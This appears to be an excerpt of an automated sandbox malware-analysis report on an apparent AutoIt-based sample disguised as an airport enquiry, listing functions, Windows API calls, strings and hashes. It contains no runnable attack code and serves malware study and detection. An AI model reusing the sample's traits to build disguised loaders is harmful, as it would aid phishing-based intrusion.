            Function 00CE99BE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00C8506B: __fread_nolock.LIBCMT ref: 00C85089
            • _wcscmp.LIBCMT ref: 00CE9AAE
            • _wcscmp.LIBCMT ref: 00CE9AC1
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: _wcscmp$__fread_nolock
            • String ID: FILE
            • API String ID: 4029003684-3121273764
            • Opcode ID: 451c4baf95529f3f1b1992cd9a18d1664513f2fccb00b275c1b8c4d40715234e
            • Instruction ID: 9c1ab5b5d602ed8748f0d78cba35731d7a88ed9db12d9f44b668f11c92c04ac6
            • Opcode Fuzzy Hash: 451c4baf95529f3f1b1992cd9a18d1664513f2fccb00b275c1b8c4d40715234e
            • Instruction Fuzzy Hash: 8841E372A0064ABADF20AAA5CC45FEFBBF9DF45714F000069B900E7181DBB5AE0497A5
            Function 00CF2882 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
            Download Yara Rule
            APIs
            • _memset.LIBCMT ref: 00CF2892
            • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00CF28C8
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: CrackInternet_memset
            • String ID: |
            • API String ID: 1413715105-2343686810
            • Opcode ID: 996e21ae076ae6216acc4ae470926106d303d4ca648b395f283e452db29bb13d
            • Instruction ID: a6e0293b3934e4251d32314f09366d1530949c6e12a8c18625c1370c035ff635
            • Opcode Fuzzy Hash: 996e21ae076ae6216acc4ae470926106d303d4ca648b395f283e452db29bb13d
            • Instruction Fuzzy Hash: 4F313071800219AFCF01EFA1DC85EEEBFB9FF08304F104125F915A61A5EB319A56DB61
            Function 00D07CE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON
            Download Yara Rule
            APIs
            • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00D07DD0
            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00D07DE5
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: MessageSend
            • String ID: '
            • API String ID: 3850602802-1997036262
            • Opcode ID: a41e0b7ebcd81bbf68342efbf37500a0cbe11ae8eed49ea47e07c5bba92215de
            • Instruction ID: 81abd5b614bf78b9c6f2bed4cf9e626251960204c8a115e20bc31919c60d80a7
            • Opcode Fuzzy Hash: a41e0b7ebcd81bbf68342efbf37500a0cbe11ae8eed49ea47e07c5bba92215de
            • Instruction Fuzzy Hash: EC41E274E0520ADFDB54CF68D891BEABBB5FF09300F14016AE909AB391D771A951CFA0
            Function 00D06CD2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
            Download Yara Rule
            APIs
            • DestroyWindow.USER32(?,?,?,?), ref: 00D06D86
            • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00D06DC2
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Window$DestroyMove
            • String ID: static
            • API String ID: 2139405536-2160076837
            • Opcode ID: 54a54a901912dc2419e67d53881ec365c9f8f80e8d2df46ff9c2b8bdec554a74
            • Instruction ID: afd25e50b6d51d195d957fc5d12f41095ca88af830b1bc040cf01f289ce61434
            • Opcode Fuzzy Hash: 54a54a901912dc2419e67d53881ec365c9f8f80e8d2df46ff9c2b8bdec554a74
            • Instruction Fuzzy Hash: 89315E71210604AEEB109F64CC80BFB77A9FF48724F148619F9AAD7190DA71EC91DB74
            Function 00CE2D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
            Download Yara Rule
            APIs
            • _memset.LIBCMT ref: 00CE2E00
            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00CE2E3B
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: InfoItemMenu_memset
            • String ID: 0
            • API String ID: 2223754486-4108050209
            • Opcode ID: 15562236ae607cd4ea64a8716ae663e0a966d0aae721d3e5e299d388957996a7
            • Instruction ID: ca6eb57f438e8310d113429e590853ee672663b29b662a5344ea53a0034b5b32
            • Opcode Fuzzy Hash: 15562236ae607cd4ea64a8716ae663e0a966d0aae721d3e5e299d388957996a7
            • Instruction Fuzzy Hash: C131F531A00395ABEB248F4ACC45BAEBBBDFF05351F180069E995A71A0E7709B40DB10
            Function 00CF3CDD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON
            Download Yara Rule
            APIs
            • __snwprintf.LIBCMT ref: 00CF3D5A
              • Part of subcall function 00C87F41: _memmove.LIBCMT ref: 00C87F82
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: __snwprintf_memmove
            • String ID: , $$AUTOITCALLVARIABLE%d
            • API String ID: 3506404897-2584243854
            • Opcode ID: 3f3b42c61b02157a8ff1c47ee15f6d7651f7f51950e6e9aa15716ce6d7f42d73
            • Instruction ID: 93d2f11432746608e60564353ae36c9eae0f68d63ae69e5e96ac6f5a165e81c8
            • Opcode Fuzzy Hash: 3f3b42c61b02157a8ff1c47ee15f6d7651f7f51950e6e9aa15716ce6d7f42d73
            • Instruction Fuzzy Hash: BB219E31600219AFCF15EF64CC86AADB7A4FF44704F500498F905AB281EB70EA05EBB6
            Function 00D06943 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
            Download Yara Rule
            APIs
            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00D069D0
            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00D069DB
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: MessageSend
            • String ID: Combobox
            • API String ID: 3850602802-2096851135
            • Opcode ID: ba3ce0555e8dbbd8227373160e32537946cd9610b33f4e1f07dd4c9b7843fb06
            • Instruction ID: f3332223a864b746c4010122dc08a00f0f3b77a4cd8b16595979d3d507cab1c4
            • Opcode Fuzzy Hash: ba3ce0555e8dbbd8227373160e32537946cd9610b33f4e1f07dd4c9b7843fb06
            • Instruction Fuzzy Hash: 7D11B2717002086FEF119F24DC80FAB376AEB893A4F154125F95C976D0D671DC618BB0
            Function 00D06E76 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00C81D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00C81D73
              • Part of subcall function 00C81D35: GetStockObject.GDI32(00000011), ref: 00C81D87
              • Part of subcall function 00C81D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00C81D91
            • GetWindowRect.USER32(00000000,?), ref: 00D06EE0
            • GetSysColor.USER32(00000012), ref: 00D06EFA
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Window$ColorCreateMessageObjectRectSendStock
            • String ID: static
            • API String ID: 1983116058-2160076837
            • Opcode ID: 2554323057c65fdbcba623d537ac75164ac39f8448592e562b988bc206b30232
            • Instruction ID: e39c0619bc1d26417c31688c0273d55dfaccfcf53f1d6f8b23a7b7e236f2a2db
            • Opcode Fuzzy Hash: 2554323057c65fdbcba623d537ac75164ac39f8448592e562b988bc206b30232
            • Instruction Fuzzy Hash: EF21597261020AAFDB04DFA8DC45AEA7BB8FB08314F144629FD59D3290E634E8619B60
            Function 00D06B8F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
            Download Yara Rule
            APIs
            • GetWindowTextLengthW.USER32(00000000), ref: 00D06C11
            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00D06C20
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: LengthMessageSendTextWindow
            • String ID: edit
            • API String ID: 2978978980-2167791130
            • Opcode ID: 3136753b9c9561f2fc435abc19809e134016d614727d351ea418932334228efc
            • Instruction ID: 381a0f353207d23d5a3474e9abd1aa05a01799ad0b3f3566ec9888533cb17d7b
            • Opcode Fuzzy Hash: 3136753b9c9561f2fc435abc19809e134016d614727d351ea418932334228efc
            • Instruction Fuzzy Hash: 04116AB1500208ABEB209F64DC45BEB3BA9EB05378F644724F9A9D71E0C675DCA19B70
            Function 00CE2E9E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
            Download Yara Rule
            APIs
            • _memset.LIBCMT ref: 00CE2F11
            • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00CE2F30
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: InfoItemMenu_memset
            • String ID: 0
            • API String ID: 2223754486-4108050209
            • Opcode ID: 9e780d8135b7b9600eca6a75af9cfa20fce96b454109869ea62e089e7cad089f
            • Instruction ID: 48b5d55132fc713599519ddcd2da4c9ab6327b17d29ed13e8a658f400dfda559
            • Opcode Fuzzy Hash: 9e780d8135b7b9600eca6a75af9cfa20fce96b454109869ea62e089e7cad089f
            • Instruction Fuzzy Hash: 9011B2319012F4ABDB24DF9ADC45B9D77BDEB06314F1800A5E865E72A0D7B0EE04C7A9
            Function 00CF24CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
            Download Yara Rule
            APIs
            • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00CF2520
            • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00CF2549
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Internet$OpenOption
            • String ID: <local>
            • API String ID: 942729171-4266983199
            • Opcode ID: 5e52bc6696abda9c4f197c328df8684a679901386a849cc315060f15240bb11e
            • Instruction ID: 1597d068fce9bbfaf48619dc9056e5b13150526d71230d4f69322b95ec5a82e2
            • Opcode Fuzzy Hash: 5e52bc6696abda9c4f197c328df8684a679901386a849cc315060f15240bb11e
            • Instruction Fuzzy Hash: 0711C6B0541229BEDB648F528C95EFBFF68FF05751F10812AF61586140D2705A45D6F2
            Function 00CF80A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00CF830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00CF80C8,?,00000000,?,?), ref: 00CF8322
            • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00CF80CB
            • htons.WSOCK32(00000000,?,00000000), ref: 00CF8108
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: ByteCharMultiWidehtonsinet_addr
            • String ID: 255.255.255.255
            • API String ID: 2496851823-2422070025
            • Opcode ID: a0608d7d9e080fb1184407fac77cdbd071e4b0b17f05fdda7b73fdab257a7f19
            • Instruction ID: acdccb89cfc839af30463692c8fdc8480315e5784335b30c1b03d5084c095c0f
            • Opcode Fuzzy Hash: a0608d7d9e080fb1184407fac77cdbd071e4b0b17f05fdda7b73fdab257a7f19
            • Instruction Fuzzy Hash: 8711A535600309ABDB20AF64CC86FBDB374FF44324F108617EA1597391DB71A919D756
            Function 00CD92E7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00C87F41: _memmove.LIBCMT ref: 00C87F82
              • Part of subcall function 00CDB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00CDB0E7
            • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00CD9355
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: ClassMessageNameSend_memmove
            • String ID: ComboBox$ListBox
            • API String ID: 372448540-1403004172
            • Opcode ID: c5fbf013eb9ebf738453ccb62ceee876602117fe6a541763f1bb328a10aa0017
            • Instruction ID: 7ee0fa2a98af187c4987d8d1dab2fadbb506e67c1b7329bf80e769bc096d7bae
            • Opcode Fuzzy Hash: c5fbf013eb9ebf738453ccb62ceee876602117fe6a541763f1bb328a10aa0017
            • Instruction Fuzzy Hash: DF01B575A05214ABCB04FBA5CC918FE7769FF06720B14071AFA32573D1DB31690CA760
            Function 00CD91DF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00C87F41: _memmove.LIBCMT ref: 00C87F82
              • Part of subcall function 00CDB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00CDB0E7
            • SendMessageW.USER32(?,00000180,00000000,?), ref: 00CD924D
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: ClassMessageNameSend_memmove
            • String ID: ComboBox$ListBox
            • API String ID: 372448540-1403004172
            • Opcode ID: 8e4af9d98b16dc11461a880eead56c7cd747ca8eb9c9531c7a6236a5a700caca
            • Instruction ID: ca3b3c3add08ae453c11e1bc47cd11c1eef408b29282d99a2acf8d28ba23c325
            • Opcode Fuzzy Hash: 8e4af9d98b16dc11461a880eead56c7cd747ca8eb9c9531c7a6236a5a700caca
            • Instruction Fuzzy Hash: 1B018875A411047BCB14FBA0C992DFF73A8DF15700F24011A7612673C1EA61AF1CA775
            Function 00CD9264 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00C87F41: _memmove.LIBCMT ref: 00C87F82
              • Part of subcall function 00CDB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00CDB0E7
            • SendMessageW.USER32(?,00000182,?,00000000), ref: 00CD92D0
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: ClassMessageNameSend_memmove
            • String ID: ComboBox$ListBox
            • API String ID: 372448540-1403004172
            • Opcode ID: 9d42ea54a476f64287e6b8682a94f70be6e61d0b3557334badd8ca76dff028ef
            • Instruction ID: 6638e8a0cbf60d505f011be5b4e5767a2068d7609bd39d782940c8f92c7956b2
            • Opcode Fuzzy Hash: 9d42ea54a476f64287e6b8682a94f70be6e61d0b3557334badd8ca76dff028ef
            • Instruction Fuzzy Hash: 05018475A411047BCB04FAA0C992AFF77A8DB11700F2401167A1263291DB619F0CA275
            Function 00CE51CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: ClassName_wcscmp
            • String ID: #32770
            • API String ID: 2292705959-463685578
            • Opcode ID: 33ac10eea4ad0258a05f3bfb2bd0b6b689891c49c8ba6cf3e34e49cdd9f32b98
            • Instruction ID: a47d2ae107790e37f04b654c65340180eb6a17c0d6e5e308d7b3c40174409d03
            • Opcode Fuzzy Hash: 33ac10eea4ad0258a05f3bfb2bd0b6b689891c49c8ba6cf3e34e49cdd9f32b98
            • Instruction Fuzzy Hash: 10E06833A0032D2BE3209B9AAC09FA7F7ACEB41731F00006BFD14D3140E660AA448BF1
            Function 00CD81BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
            Download Yara Rule
            APIs
            • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00CD81CA
              • Part of subcall function 00CA3598: _doexit.LIBCMT ref: 00CA35A2
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Message_doexit
            • String ID: AutoIt$Error allocating memory.
            • API String ID: 1993061046-4017498283
            • Opcode ID: 673fc929902188fc9255b6bca534771b3b090d8c224bb323c9e5b702d896e841
            • Instruction ID: 45faea289e7d1ee26384f9f7cb520720907ff91cbbf98cb94bd9bbc7da9dae6d
            • Opcode Fuzzy Hash: 673fc929902188fc9255b6bca534771b3b090d8c224bb323c9e5b702d896e841
            • Instruction Fuzzy Hash: F6D05B323C535936D21533E97C07FCA75884B05B55F144016BB08955D38ED295D552FD
            Function 00CBB511 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00CBB564: _memset.LIBCMT ref: 00CBB571
              • Part of subcall function 00CA0B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00CBB540,?,?,?,00C8100A), ref: 00CA0B89
            • IsDebuggerPresent.KERNEL32(?,?,?,00C8100A), ref: 00CBB544
            • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00C8100A), ref: 00CBB553
            Strings
            • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00CBB54E
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
